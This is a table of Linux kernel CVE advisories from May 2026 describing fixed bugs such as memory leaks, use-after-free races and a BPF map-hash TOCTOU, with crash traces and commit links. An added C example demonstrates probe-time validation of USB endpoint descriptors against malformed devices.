| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: usb: catc: enable basic endpoint checking catc_probe() fills three URBs with hardcoded endpoint pipes without verifying the endpoint descriptors: - usb_sndbulkpipe(usbdev, 1) and usb_rcvbulkpipe(usbdev, 1) for TX/RX - usb_rcvintpipe(usbdev, 2) for interrupt status A malformed USB device can present these endpoints with transfer types that differ from what the driver assumes. Add a catc_usb_ep enum for endpoint numbers, replacing magic constants throughout. Add usb_check_bulk_endpoints() and usb_check_int_endpoints() calls after usb_set_interface() to verify endpoint types before use, rejecting devices with mismatched descriptors at probe time. Similar to - commit 90b7f2961798 ("net: usb: rtl8150: enable basic endpoint checking") which fixed the issue in rtl8150. | 2026-05-27 | not yet calculated | CVE-2026-45923 | https://git.kernel.org/stable/c/eade522d3e6ac3f3bfb51bfa5b5b4b32bd0b846f https://git.kernel.org/stable/c/ac7739b78ded519e1d9919a814da3b34120bec8c https://git.kernel.org/stable/c/163d04897e57633c5d2e69734e4e4b22bb63f50d https://git.kernel.org/stable/c/a488001a8197da4f9c413eec8f6acbff71c60145 https://git.kernel.org/stable/c/36c28b028efba0f42218d41fed12c47ce217c1f1 https://git.kernel.org/stable/c/1a42cfced8900d33d032c7ec338484855b61b8cc https://git.kernel.org/stable/c/9e7021d2aeae57c323a6f722ed7915686cdcc123 |
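The check this entry adds is a general rule for USB drivers: never trust that endpoint N has the transfer type you are about to use it for, because the descriptors come from the device. The following standalone C program is an added example, not the catc driver's code; the kernel's usb_check_bulk_endpoints() and usb_check_int_endpoints() work on the already-parsed struct usb_host_endpoint table of an interface, whereas this example parses the raw descriptor bytes itself so it runs offline. The descriptor blobs are constructed for the example, and the helper names `find_endpoint`, `check_endpoints` and `catc_endpoints_ok` as well as the `catc_usb_ep` enumerator names are this example's own.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Constants with the same values as include/uapi/linux/usb/ch9.h. */
#define USB_DT_ENDPOINT            0x05
#define USB_DIR_IN                 0x80
#define USB_ENDPOINT_XFERTYPE_MASK 0x03
#define USB_ENDPOINT_XFER_BULK     2
#define USB_ENDPOINT_XFER_INT      3

/* Endpoint numbers the catc driver hardcodes (enumerator names are this example's). */
enum catc_usb_ep { CATC_EP_BULK = 1, CATC_EP_INTR = 2 };

/* Walk a descriptor blob and return the bmAttributes byte of the endpoint
 * descriptor whose bEndpointAddress is `addr`, or -1 if it is absent or the
 * blob is malformed. Every descriptor starts with bLength, bDescriptorType;
 * an endpoint descriptor is bLength(7), type(5), bEndpointAddress,
 * bmAttributes, wMaxPacketSize(2), bInterval. */
static int find_endpoint(const uint8_t *desc, size_t len, uint8_t addr)
{
    size_t off = 0;

    while (off + 2 <= len) {
        uint8_t blen = desc[off], btype = desc[off + 1];

        if (blen < 2 || off + blen > len)
            return -1;   /* bLength lies: stop instead of reading past the blob */
        if (btype == USB_DT_ENDPOINT && blen >= 7 && desc[off + 2] == addr)
            return desc[off + 3];
        off += blen;
    }
    return -1;
}

/* Same contract as usb_check_bulk_endpoints()/usb_check_int_endpoints(): every
 * address in the NUL-terminated list must exist with the given transfer type. */
static int check_endpoints(const uint8_t *desc, size_t len,
                           const uint8_t *addrs, int xfer_type)
{
    for (; *addrs; addrs++) {
        int attr = find_endpoint(desc, len, *addrs);

        if (attr < 0 || (attr & USB_ENDPOINT_XFERTYPE_MASK) != xfer_type)
            return 0;
    }
    return 1;
}

/* The probe-time check: bulk OUT and IN on endpoint 1, interrupt IN on endpoint 2. */
int catc_endpoints_ok(const uint8_t *desc, size_t len)
{
    static const uint8_t bulk_eps[] = { CATC_EP_BULK, CATC_EP_BULK | USB_DIR_IN, 0 };
    static const uint8_t int_eps[]  = { CATC_EP_INTR | USB_DIR_IN, 0 };

    return check_endpoints(desc, len, bulk_eps, USB_ENDPOINT_XFER_BULK) &&
           check_endpoints(desc, len, int_eps, USB_ENDPOINT_XFER_INT);
}

/* Constructed descriptor blobs (not captured from real hardware). */
static const uint8_t good_desc[] = {
    0x09, 0x04, 0x00, 0x00, 0x03, 0xff, 0xff, 0xff, 0x00, /* interface, 3 endpoints */
    0x07, 0x05, 0x01, 0x02, 0x40, 0x00, 0x00,             /* EP1 OUT, bulk */
    0x07, 0x05, 0x81, 0x02, 0x40, 0x00, 0x00,             /* EP1 IN,  bulk */
    0x07, 0x05, 0x82, 0x03, 0x08, 0x00, 0x01,             /* EP2 IN,  interrupt */
};
/* A hostile device advertising EP2 IN as bulk: without the check the driver
 * would submit its interrupt URB to an endpoint of the wrong type. */
static const uint8_t bad_desc[] = {
    0x09, 0x04, 0x00, 0x00, 0x03, 0xff, 0xff, 0xff, 0x00,
    0x07, 0x05, 0x01, 0x02, 0x40, 0x00, 0x00,
    0x07, 0x05, 0x81, 0x02, 0x40, 0x00, 0x00,
    0x07, 0x05, 0x82, 0x02, 0x08, 0x00, 0x00,             /* EP2 IN declared bulk */
};

int main(void)
{
    printf("good device accepted: %d\n", catc_endpoints_ok(good_desc, sizeof good_desc));
    printf("bad device accepted:  %d\n", catc_endpoints_ok(bad_desc, sizeof bad_desc));
    /* Truncated blob: the last descriptor's bLength overruns the buffer. */
    printf("truncated accepted:   %d\n", catc_endpoints_ok(good_desc, sizeof good_desc - 4));
    return 0;
}
```

The well-formed blob is accepted, the one with a bulk endpoint where the driver expects interrupt is rejected, and a truncated blob is rejected rather than read past its end. In a real driver the same decision is made in probe(), returning -ENODEV before any URB is filled.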
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ksmbd: call ksmbd_vfs_kern_path_end_removing() on some error paths There are two places where ksmbd_vfs_kern_path_end_removing() needs to be called in order to balance what the corresponding successful call to ksmbd_vfs_kern_path_start_removing() has done, i.e. drop inode locks and put the taken references. Otherwise there might be potential deadlocks and unbalanced locks which are caught like: BUG: workqueue leaked lock or atomic: kworker/5:21/0x00000000/7596 last function: handle_ksmbd_work 2 locks held by kworker/5:21/7596: #0: ffff8881051ae448 (sb_writers#3){.+.+}-{0:0}, at: ksmbd_vfs_kern_path_locked+0x142/0x660 #1: ffff888130e966c0 (&type->i_mutex_dir_key#3/1){+.+.}-{4:4}, at: ksmbd_vfs_kern_path_locked+0x17d/0x660 CPU: 5 PID: 7596 Comm: kworker/5:21 Not tainted 6.1.162-00456-gc29b353f383b #138 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.17.0-debian-1.17.0-1 04/01/2014 Workqueue: ksmbd-io handle_ksmbd_work Call Trace: <TASK> dump_stack_lvl+0x44/0x5b process_one_work.cold+0x57/0x5c worker_thread+0x82/0x600 kthread+0x153/0x190 ret_from_fork+0x22/0x30 </TASK> Found by Linux Verification Center (linuxtesting.org). | 2026-05-27 | not yet calculated | CVE-2026-45924 | https://git.kernel.org/stable/c/8e3a3192ef78d8302916408d62813b1fddfc8972 https://git.kernel.org/stable/c/f221baa80e5959a0c08a7e34abbf2a4d3cf0e1c2 https://git.kernel.org/stable/c/cf29329a13df79c198b45dfc92577638d30b56fa https://git.kernel.org/stable/c/34d6691933682f0516259a31b39d2cebcedec0a5 https://git.kernel.org/stable/c/0c578e8065c4b08d5635a4cbc0f6321df9d20f79 https://git.kernel.org/stable/c/4c38600feb81c670edb82e49d201d3d2d00cd4c3 https://git.kernel.org/stable/c/a09dc10d1353f0e92c21eae2a79af1c2b1ddcde8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: thermal/of: Fix reference leak in thermal_of_cm_lookup() In thermal_of_cm_lookup(), tr_np is obtained via of_parse_phandle(), but never released. Use the __free(device_node) cleanup attribute to automatically release the node and fix the leak. [ rjw: Changelog edits ] | 2026-05-27 | not yet calculated | CVE-2026-45925 | https://git.kernel.org/stable/c/8af710156c53cdb392d529497ef2b3a10a1f9370 https://git.kernel.org/stable/c/8344d5da9df74fdbef676214d0c482fc822a01ca https://git.kernel.org/stable/c/025796ccd7f9f2e013e12319de26b6c021a80c1f https://git.kernel.org/stable/c/a1fe789a96fe47733c133134fd264cb7ca832395 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rust: pwm: Fix potential memory leak on init error When initializing a PWM chip using pwmchip_alloc(), the allocated device owns an initial reference that must be released on all error paths. If __pinned_init() were to fail, the allocated pwm_chip would currently leak because the error path returns without calling pwmchip_put(). | 2026-05-27 | not yet calculated | CVE-2026-45926 | https://git.kernel.org/stable/c/baa8b7097d9cc68ff85819cf683972a58c2ce32b https://git.kernel.org/stable/c/a2633dc243c35754a0c2270131d8a199c987c9bf |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Require frozen map for calculating map hash Currently, bpf_map_get_info_by_fd calculates and caches the hash of the map regardless of the map's frozen state. This leads to a TOCTOU bug where userspace can call BPF_OBJ_GET_INFO_BY_FD to cache the hash and then modify the map contents before freezing. Therefore, a trusted loader can be tricked into verifying the stale hash while loading the modified contents. Fix this by returning -EPERM if the map is not frozen when the hash is requested. This ensures the hash is only generated for the final, immutable state of the map. | 2026-05-27 | not yet calculated | CVE-2026-45927 | https://git.kernel.org/stable/c/7752d36343862323bbeea4ce3adf0ec2ed86e122 https://git.kernel.org/stable/c/f415e114b58fe02c41191e47f24bdabb438daf72 https://git.kernel.org/stable/c/a2c86aa621c22f2a7e26c654f936d65cfff0aa91 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: chips-media: wave5: Fix memory leak on codec_info allocation failure In wave5_vpu_open_enc() and wave5_vpu_open_dec(), a vpu instance is allocated via kzalloc(). If the subsequent allocation for inst->codec_info fails, the functions return -ENOMEM without freeing the previously allocated instance, causing a memory leak. Fix this by calling kfree() on the instance in this error path to ensure it is properly released. | 2026-05-27 | not yet calculated | CVE-2026-45928 | https://git.kernel.org/stable/c/52defdd4034db1a34bb48006f889d66a3629224b https://git.kernel.org/stable/c/1de71556cbd6e1d0d26fb86b9b3bb8caa0df8495 https://git.kernel.org/stable/c/32e9e45cf7e3422d21fa64535588d3572faf71c3 https://git.kernel.org/stable/c/a519e21e32398459ba357e67b541402f7295ee1b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: mctp: ensure our nlmsg responses are initialised Syed Faraz Abrar (@farazsth98) from Zellic, and Pumpkin (@u1f383) from DEVCORE Research Team working with Trend Micro Zero Day Initiative report that a RTM_GETNEIGH will return uninitialised data in the pad bytes of the ndmsg data. Ensure we're initialising the netlink data to zero, in the link, addr and neigh response messages. | 2026-05-27 | not yet calculated | CVE-2026-45930 | https://git.kernel.org/stable/c/6fb6a97c86abb8592158088afaea0eb464cf9de1 https://git.kernel.org/stable/c/a6a9bc544b675d8b5180f2718ec985ad267b5cbf |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: fix EEXIST abort due to non-consecutive gaps in chunk allocation I have been observing a number of systems aborting at insert_dev_extents() in btrfs_create_pending_block_groups(). The following is a sample stack trace of such an abort coming from forced chunk allocation (typically behind CONFIG_BTRFS_EXPERIMENTAL) but this can theoretically happen to any DUP chunk allocation. [81.801] ------------[ cut here ]------------ [81.801] BTRFS: Transaction aborted (error -17) [81.801] WARNING: fs/btrfs/block-group.c:2876 at btrfs_create_pending_block_groups+0x721/0x770 [btrfs], CPU#1: bash/319 [81.802] Modules linked in: virtio_net btrfs xor zstd_compress raid6_pq null_blk [81.803] CPU: 1 UID: 0 PID: 319 Comm: bash Kdump: loaded Not tainted 6.19.0-rc6+ #319 NONE [81.803] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Arch Linux 1.17.0-2-2 04/01/2014 [81.804] RIP: 0010:btrfs_create_pending_block_groups+0x723/0x770 [btrfs] [81.806] RSP: 0018:ffffa36241a6bce8 EFLAGS: 00010282 [81.806] RAX: 000000000000000d RBX: ffff8e699921e400 RCX: 0000000000000000 [81.807] RDX: 0000000002040001 RSI: 00000000ffffffef RDI: ffffffffc0608bf0 [81.807] RBP: 00000000ffffffef R08: ffff8e69830f6000 R09: 0000000000000007 [81.808] R10: ffff8e699921e5e8 R11: 0000000000000000 R12: ffff8e6999228000 [81.808] R13: ffff8e6984d82000 R14: ffff8e69966a69c0 R15: ffff8e69aa47b000 [81.809] FS: 00007fec6bdd9740(0000) GS:ffff8e6b1b379000(0000) knlGS:0000000000000000 [81.809] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [81.810] CR2: 00005604833670f0 CR3: 0000000116679000 CR4: 00000000000006f0 [81.810] Call Trace: [81.810] <TASK> [81.810] __btrfs_end_transaction+0x3e/0x2b0 [btrfs] [81.811] btrfs_force_chunk_alloc_store+0xcd/0x140 [btrfs] [81.811] kernfs_fop_write_iter+0x15f/0x240 [81.812] vfs_write+0x264/0x500 [81.812] ksys_write+0x6c/0xe0 [81.812] do_syscall_64+0x66/0x770 [81.812] entry_SYSCALL_64_after_hwframe+0x76/0x7e [81.813] RIP: 0033:0x7fec6be66197 [81.814] RSP: 002b:00007fffb159dd30 EFLAGS: 00000202 ORIG_RAX: 0000000000000001 [81.815] RAX: ffffffffffffffda RBX: 00007fec6bdd9740 RCX: 00007fec6be66197 [81.815] RDX: 0000000000000002 RSI: 0000560483374f80 RDI: 0000000000000001 [81.816] RBP: 0000560483374f80 R08: 0000000000000000 R09: 0000000000000000 [81.816] R10: 0000000000000000 R11: 0000000000000202 R12: 0000000000000002 [81.817] R13: 00007fec6bfb85c0 R14: 00007fec6bfb5ee0 R15: 00005604833729c0 [81.817] </TASK> [81.817] irq event stamp: 20039 [81.818] hardirqs last enabled at (20047): [<ffffffff99a68302>] __up_console_sem+0x52/0x60 [81.818] hardirqs last disabled at (20056): [<ffffffff99a682e7>] __up_console_sem+0x37/0x60 [81.819] softirqs last enabled at (19470): [<ffffffff999d2b46>] __irq_exit_rcu+0x96/0xc0 [81.819] softirqs last disabled at (19463): [<ffffffff999d2b46>] __irq_exit_rcu+0x96/0xc0 [81.820] ---[ end trace 0000000000000000 ]--- [81.820] BTRFS: error (device dm-7 state A) in btrfs_create_pending_block_groups:2876: errno=-17 Object already exists Inspecting these aborts with drgn, I observed a pattern of overlapping chunk_maps. Note how stripe 1 of the first chunk overlaps in physical address with stripe 0 of the second chunk. Physical Start Physical End Length Logical Type Stripe ---------------------------------------------------------------------------------------------------- 0x0000000102500000 0x0000000142500000 1.0G 0x0000000641d00000 META|DUP 0/2 0x0000000142500000 0x0000000182500000 1.0G 0x0000000641d00000 META|DUP 1/2 0x0000000142500000 0x0000000182500000 1.0G 0x0000000601d00000 META|DUP 0/2 0x0000000182500000 0x00000001c2500000 1.0G 0x0000000601d00000 META|DUP 1/2 Now how could this possibly happen? All chunk allocation is ---truncated--- | 2026-05-27 | not yet calculated | CVE-2026-45934 | https://git.kernel.org/stable/c/7d4eadee7042d27fcea659fcdd738f463a7d2e70 https://git.kernel.org/stable/c/156cac365e27a82b64ae510c5f463fd81f0265b1 https://git.kernel.org/stable/c/b14c5e04bd0f722ed631845599d52d03fcae1bc1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: power: supply: goldfish: Fix use-after-free in power_supply_changed() Using the `devm_` variant for requesting IRQ _before_ the `devm_` variant for allocating/registering the `power_supply` handle, means that the `power_supply` handle will be deallocated/unregistered _before_ the interrupt handler (since `devm_` naturally deallocates in reverse allocation order). This means that during removal, there is a race condition where an interrupt can fire just _after_ the `power_supply` handle has been freed, *but* just _before_ the corresponding unregistration of the IRQ handler has run. This will lead to the IRQ handler calling `power_supply_changed()` with a freed `power_supply` handle. Which usually crashes the system or otherwise silently corrupts the memory... Note that there is a similar situation which can also happen during `probe()`; the possibility of an interrupt firing _before_ registering the `power_supply` handle. This would then lead to the nasty situation of using the `power_supply` handle *uninitialized* in `power_supply_changed()`. Fix this racy use-after-free by making sure the IRQ is requested _after_ the registration of the `power_supply` handle. | 2026-05-27 | not yet calculated | CVE-2026-45936 | https://git.kernel.org/stable/c/589d4fe56713c6344cd9f8939f9c7621c85f0966 https://git.kernel.org/stable/c/bad8b61eb5059acd88349680e47839342dc89e94 https://git.kernel.org/stable/c/33751e28842bf5aee5ef7b2b8d5e456a069095cb https://git.kernel.org/stable/c/77ea437faa4c06362e3ecfd2d7264eaa7ac1e82c https://git.kernel.org/stable/c/4350505e82b4f972ddb788e1c712c557c38859d0 https://git.kernel.org/stable/c/8c89aade8335e26a6a7dcda18992d15f51943927 https://git.kernel.org/stable/c/0b29ffe4090a3fc7a7649de20e1eb1e53adddac7 https://git.kernel.org/stable/c/b2ce982e2e0c888dc55c888ad0e20ea04daf2e6b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: inside-secure/eip93 - fix kernel panic in driver detach During driver detach, the same hash algorithm is unregistered multiple times due to a wrong iterator. | 2026-05-27 | not yet calculated | CVE-2026-45937 | https://git.kernel.org/stable/c/7530c3595d1e23bc5938cbd44b7e8f33457fc71f https://git.kernel.org/stable/c/91c6f25075a8f8fbd7316d73e1edf281a94f78df https://git.kernel.org/stable/c/b6e32ba6d32503440a3e3e16c8d0521cbb7e0c5d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: power: supply: pm8916_lbc: Fix use-after-free in power_supply_changed() Using the `devm_` variant for requesting IRQ _before_ the `devm_` variant for allocating/registering the `power_supply` handle, means that the `power_supply` handle will be deallocated/unregistered _before_ the interrupt handler (since `devm_` naturally deallocates in reverse allocation order). This means that during removal, there is a race condition where an interrupt can fire just _after_ the `power_supply` handle has been freed, *but* just _before_ the corresponding unregistration of the IRQ handler has run. This will lead to the IRQ handler calling `power_supply_changed()` with a freed `power_supply` handle. Which usually crashes the system or otherwise silently corrupts the memory... Note that there is a similar situation which can also happen during `probe()`; the possibility of an interrupt firing _before_ registering the `power_supply` handle. This would then lead to the nasty situation of using the `power_supply` handle *uninitialized* in `power_supply_changed()`. Fix this racy use-after-free by making sure the IRQ is requested _after_ the registration of the `power_supply` handle. | 2026-05-27 | not yet calculated | CVE-2026-45938 | https://git.kernel.org/stable/c/dbe579e620ef0f53db490ec79a8566e4ea8918ac https://git.kernel.org/stable/c/08e674e9862a2db46fb234eb7c5442455ece0131 https://git.kernel.org/stable/c/d7d31fc99d248d5f47588f50dce5c7599c991c6a https://git.kernel.org/stable/c/b7508129978ae1e2ed9b0410396abc05def9c4eb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: gpib: Fix memory leak in ni_usb_init() In ni_usb_init(), if ni_usb_setup_init() fails, the function returns -EFAULT without freeing the allocated writes buffer, leading to a memory leak. Additionally, ni_usb_setup_init() returns 0 on failure, which causes ni_usb_init() to return -EFAULT, an inappropriate error code for this situation. Fix the leak by freeing writes in the error path. Modify ni_usb_setup_init() to return -EINVAL on failure and propagate this error code in ni_usb_init(). | 2026-05-27 | not yet calculated | CVE-2026-45939 | https://git.kernel.org/stable/c/9c97fcfb7a62dea893104a046d544da8ac23370b https://git.kernel.org/stable/c/c899d4b62c0757a280831e89c1f3801b597e8f38 https://git.kernel.org/stable/c/b89921eed8cf2d97250bac4be38dbcfbf048b586 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: stmmac: fix oops when split header is enabled For GMAC4, when split header is enabled, in some rare cases, the hardware does not fill buf2 of the first descriptor with payload. Thus we cannot assume buf2 is always fully filled if it is not the last descriptor. Otherwise, the length of buf2 of the second descriptor will be calculated wrong and cause an oops: Unable to handle kernel paging request at virtual address ffff00019246bfc0 ... x2 : 0000000000000040 x1 : ffff00019246bfc0 x0 : ffff00009246c000 Call trace: dcache_inval_poc+0x28/0x58 (P) dma_direct_sync_single_for_cpu+0x38/0x6c __dma_sync_single_for_cpu+0x34/0x6c stmmac_napi_poll_rx+0x8f0/0xb60 __napi_poll.constprop.0+0x30/0x144 net_rx_action+0x160/0x274 handle_softirqs+0x1b8/0x1fc ... To fix this, the PL bit-field in RDES3 register is used for all descriptors, whether it is the last descriptor or not. | 2026-05-27 | not yet calculated | CVE-2026-45940 | https://git.kernel.org/stable/c/b1f23df09e7dbf4c86b6908dff7efb8cb2b7d609 https://git.kernel.org/stable/c/36f81cb7d82e9614a7058da6abdf2e3a03993df1 https://git.kernel.org/stable/c/babab1b42ed68877ef669a08384becf281ad2582 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tpm: tpm_i2c_infineon: Fix locality leak on get_burstcount() failure get_burstcount() can return -EBUSY on timeout. When this happens, the function returns directly without releasing the locality that was acquired at the beginning of tpm_tis_i2c_send(). Use goto out_err to ensure proper cleanup when get_burstcount() fails. | 2026-05-27 | not yet calculated | CVE-2026-45941 | https://git.kernel.org/stable/c/8f124c5582d443ac9fb690db26d08cab5d6ba76e https://git.kernel.org/stable/c/c24c9c4cab11858f22f309521ba7ea5b1e7385f2 https://git.kernel.org/stable/c/1bb8f8826d0748b4b92a98fb6b6dfe52081739f5 https://git.kernel.org/stable/c/948966e546f29af04391d98b8e378e4a7670c1c1 https://git.kernel.org/stable/c/a61b8412e3eb8b71646dba867e8252d8560a1a27 https://git.kernel.org/stable/c/1a22048c1117cdfac185ba450aba67ed6b65dc87 https://git.kernel.org/stable/c/2f7a665e1323359d99c74301d1e180f5e2c40181 https://git.kernel.org/stable/c/bbd6e97c836cbeb9606d7b7e5dcf8a1d89525713 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: erofs: fix inline data read failure for ztailpacking pclusters Compressed folios for ztailpacking pclusters must be valid before adding these pclusters to I/O chains. Otherwise, z_erofs_decompress_pcluster() may assume they are already valid and then trigger a NULL pointer dereference. It is somewhat hard to reproduce because the inline data is in the same block as the tail of the compressed indexes, which are usually read just before. However, it may still happen if a fatal signal arrives while read_mapping_folio() is running, as shown below: erofs: (device dm-1): z_erofs_pcluster_begin: failed to get inline data -4 Unable to handle kernel NULL pointer dereference at virtual address 0000000000000008 ... pc : z_erofs_decompress_queue+0x4c8/0xa14 lr : z_erofs_decompress_queue+0x160/0xa14 sp : ffffffc08b3eb3a0 x29: ffffffc08b3eb570 x28: ffffffc08b3eb418 x27: 0000000000001000 x26: ffffff8086ebdbb8 x25: ffffff8086ebdbb8 x24: 0000000000000001 x23: 0000000000000008 x22: 00000000fffffffb x21: dead000000000700 x20: 00000000000015e7 x19: ffffff808babb400 x18: ffffffc089edc098 x17: 00000000c006287d x16: 00000000c006287d x15: 0000000000000004 x14: ffffff80ba8f8000 x13: 0000000000000004 x12: 00000006589a77c9 x11: 0000000000000015 x10: 0000000000000000 x9 : 0000000000000000 x8 : 0000000000000000 x7 : 0000000000000000 x6 : 000000000000003f x5 : 0000000000000040 x4 : ffffffffffffffe0 x3 : 0000000000000020 x2 : 0000000000000008 x1 : 0000000000000000 x0 : 0000000000000000 Call trace: z_erofs_decompress_queue+0x4c8/0xa14 z_erofs_runqueue+0x908/0x97c z_erofs_read_folio+0x128/0x228 filemap_read_folio+0x68/0x128 filemap_get_pages+0x44c/0x8b4 filemap_read+0x12c/0x5b8 generic_file_read_iter+0x4c/0x15c do_iter_readv_writev+0x188/0x1e0 vfs_iter_read+0xac/0x1a4 backing_file_read_iter+0x170/0x34c ovl_read_iter+0xf0/0x140 vfs_read+0x28c/0x344 ksys_read+0x80/0xf0 __arm64_sys_read+0x24/0x34 invoke_syscall+0x60/0x114 el0_svc_common+0x88/0xe4 do_el0_svc+0x24/0x30 el0_svc+0x40/0xa8 el0t_64_sync_handler+0x70/0xbc el0t_64_sync+0x1bc/0x1c0 Fix this by reading the inline data before allocating and adding the pclusters to the I/O chains. | 2026-05-27 | not yet calculated | CVE-2026-45943 | https://git.kernel.org/stable/c/ad07ea069f924465061cfee40ef2861bb99f4dd8 https://git.kernel.org/stable/c/5de1aa0bf3a5db0b3cbf61959da5ac61250833ed https://git.kernel.org/stable/c/92088bd9aa2a7246bba8b9648fbc64edd173cf17 https://git.kernel.org/stable/c/c134a40f86efb8d6b5a949ef70e06d5752209be5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: power: supply: ab8500: Fix use-after-free in power_supply_changed() Using the `devm_` variant for requesting IRQ _before_ the `devm_` variant for allocating/registering the `power_supply` handle, means that the `power_supply` handle will be deallocated/unregistered _before_ the interrupt handler (since `devm_` naturally deallocates in reverse allocation order). This means that during removal, there is a race condition where an interrupt can fire just _after_ the `power_supply` handle has been freed, *but* just _before_ the corresponding unregistration of the IRQ handler has run. This will lead to the IRQ handler calling `power_supply_changed()` with a freed `power_supply` handle. Which usually crashes the system or otherwise silently corrupts the memory... Note that there is a similar situation which can also happen during `probe()`; the possibility of an interrupt firing _before_ registering the `power_supply` handle. This would then lead to the nasty situation of using the `power_supply` handle *uninitialized* in `power_supply_changed()`. Commit 1c1f13a006ed ("power: supply: ab8500: Move to componentized binding") introduced this issue during a refactorization. Fix this racy use-after-free by making sure the IRQ is requested _after_ the registration of the `power_supply` handle. | 2026-05-27 | not yet calculated | CVE-2026-45946 | https://git.kernel.org/stable/c/43cbb78ee047b9b12d096d40e3be265969d4c1f8 https://git.kernel.org/stable/c/551672981fe227122258a25a385a05f5c0746ad6 https://git.kernel.org/stable/c/f50433f2603def08b21a4bf2fd238687fb5cbde9 https://git.kernel.org/stable/c/847eeb6c0efcd76c7def73857cf798a4fcd8f79b https://git.kernel.org/stable/c/709db4b476e254579d9c48ec34d397a41ca0c407 https://git.kernel.org/stable/c/46dbda27b028d78087667e8280966b99cec015ca https://git.kernel.org/stable/c/c4af8a98bb52825a5331ae1d0604c0ea6956ba4b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: Fix memory leak in amdgpu_acpi_enumerate_xcc() In amdgpu_acpi_enumerate_xcc(), if amdgpu_acpi_dev_init() returns -ENOMEM, the function returns directly without releasing the allocated xcc_info, resulting in a memory leak. Fix this by ensuring that xcc_info is properly freed in the error paths. Compile tested only. Issue found using a prototype static analysis tool and code review. | 2026-05-27 | not yet calculated | CVE-2026-45947 | https://git.kernel.org/stable/c/e87c73a80a12d337cf5f493c0956f6c2c9eafd80 https://git.kernel.org/stable/c/18a7bbd11f17a7cd4c42fd5955d3675d68c692df https://git.kernel.org/stable/c/d1370ef2ecf7d4df25e3e1e430cd191b1e7f8596 https://git.kernel.org/stable/c/7e4b612fe7a960d610c20260c9ee220bddd1b215 https://git.kernel.org/stable/c/c9be63d565789b56ca7b0197e2cb78a3671f95a8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: fix memory leak in ext4_ext_shift_extents() In ext4_ext_shift_extents(), if the extent is NULL in the while loop, the function returns immediately without releasing the path obtained via ext4_find_extent(), leading to a memory leak. Fix this by jumping to the out label to ensure the path is properly released. | 2026-05-27 | not yet calculated | CVE-2026-45948 | https://git.kernel.org/stable/c/7e807cb8603b7664fa630a696cd891d9a03c248d https://git.kernel.org/stable/c/afc5e61e1a07b2b833bd72cbee36ecce9cd901e2 https://git.kernel.org/stable/c/1bce219ee5512cf179ba40cf114945a14a16e21f https://git.kernel.org/stable/c/4a79fde8db7eba7f1128d971ceba4e3c9ac84aec https://git.kernel.org/stable/c/2f4b1052246ca646bb17bfe0f53df2fdf9729b58 https://git.kernel.org/stable/c/12615ab4bfb69678e5d961b28bb70040299e51b1 https://git.kernel.org/stable/c/bd7b52557e4a3ccd7595fdb3a585f1257de57935 https://git.kernel.org/stable/c/ca81109d4a8f192dc1cbad4a1ee25246363c2833 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hwrng: core - use RCU and work_struct to fix race condition Currently, hwrng_fill is not cleared until the hwrng_fillfn() thread exits. Since hwrng_unregister() reads hwrng_fill outside the rng_mutex lock, a concurrent hwrng_unregister() may call kthread_stop() again on the same task. Additionally, if hwrng_unregister() is called immediately after hwrng_register(), the stopped thread may have never been executed. Thus, hwrng_fill remains dirty even after hwrng_unregister() returns. In this case, subsequent calls to hwrng_register() will fail to start new threads, and hwrng_unregister() will call kthread_stop() on the same freed task. In both cases, a use-after-free occurs: refcount_t: addition on 0; use-after-free. WARNING: ... at lib/refcount.c:25 refcount_warn_saturate+0xec/0x1c0 Call Trace: kthread_stop+0x181/0x360 hwrng_unregister+0x288/0x380 virtrng_remove+0xe3/0x200 This patch fixes the race by protecting the global hwrng_fill pointer inside the rng_mutex lock, so that hwrng_fillfn() thread is stopped only once, and calls to kthread_run() and kthread_stop() are serialized with the lock held. To avoid deadlock in hwrng_fillfn() while being stopped with the lock held, we convert current_rng to RCU, so that get_current_rng() can read current_rng without holding the lock. To remove the lock from put_rng(), we also delay the actual cleanup into a work_struct. Since get_current_rng() no longer returns ERR_PTR values, the IS_ERR() checks are removed from its callers. With hwrng_fill protected by the rng_mutex lock, hwrng_fillfn() can no longer clear hwrng_fill itself. Therefore, if hwrng_fillfn() returns directly after current_rng is dropped, kthread_stop() would be called on a freed task_struct later. To fix this, hwrng_fillfn() calls schedule() now to keep the task alive until being stopped. The kthread_stop() call is also moved from hwrng_unregister() to drop_current_rng(), ensuring kthread_stop() is called on all possible paths where current_rng becomes NULL, so that the thread would not wait forever. | 2026-05-27 | not yet calculated | CVE-2026-45949 | https://git.kernel.org/stable/c/d5b7730f06994499632026c30e38e0317c4569e2 https://git.kernel.org/stable/c/dcf416eb88eafe1e3c0f920a14bdffd10bc4d259 https://git.kernel.org/stable/c/ad38f2cdfef9a2f2899c30cad269baec5bfd4a5d https://git.kernel.org/stable/c/cc2f39d6ac48e6e3cb2d6240bc0d6df839dd0828 |
